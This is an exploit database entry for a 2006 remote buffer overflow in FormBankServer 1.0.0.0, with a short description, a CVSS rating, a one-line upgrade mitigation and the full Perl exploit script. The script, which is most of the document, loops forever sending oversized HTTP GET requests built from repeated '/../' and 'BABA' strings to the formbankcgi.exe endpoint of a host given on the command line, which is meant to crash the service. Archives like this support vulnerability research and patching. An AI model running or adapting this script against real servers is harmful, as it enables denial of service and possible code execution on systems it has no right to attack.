FormBankServer Remote Buffer Overflow

vendor:

FormBankServer

by:

Bl0od3r

9,3

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: FormBankServer

Affected Version From: 1.0.0.0

Affected Version To: 1.0.0.0

Patch Exists: YES

Related CWE: N/A

CPE: //a:formbankserver:formbankserver:1.0.0.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2006

FormBankServer Remote Buffer Overflow

FormBankServer is prone to a remote buffer overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely crash the application. This issue affects FormBankServer version 1.0.0.0 and prior.

Mitigation:

Upgrade to the latest version of FormBankServer

Source

Exploit-DB raw data:

#!perl
#Vulnerability found by Bl0od3r
#visit http://dc3.dl.am to see more exploits
#http://www.fersch.de/formbankserver/
#download:http://www.download-tipp.de/cgi-bin/jump.cgi?ID=8796
- Hide quoted text -
use IO::Socket;
use warnings;
 package exploit;
 sub new { bless {} }
 sub bar {
         my $self = shift;
$self->{host}=$ARGV[0];
$self->{port}=$ARGV[1];
&start;
}
 my $attack = exploit->new();
 $attack->bar();
 

sub error() {
print("Connection Refused.Check the host now.It seems like its successfully attacked.");
}

sub start() {
$host=$ARGV[0];
$port=$ARGV[1];
$buff="/../" x 999;
die("No Host.") unless($host);
die("No Port.") unless($port);
for ($i=0;$i<99999;$i++) {
      while () {
$buff.="BABA";
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || &error();
    syswrite STDOUT,"+";
    print $sock "GET /cgi-bin/formbankcgi.exe/Abfrage?Name=".$buff." HTTP/1.1\n";
        print $sock "Connection: close\n\n";
    syswrite STDOUT,"+";
  }
 }
}

# milw0rm.com [2006-12-31]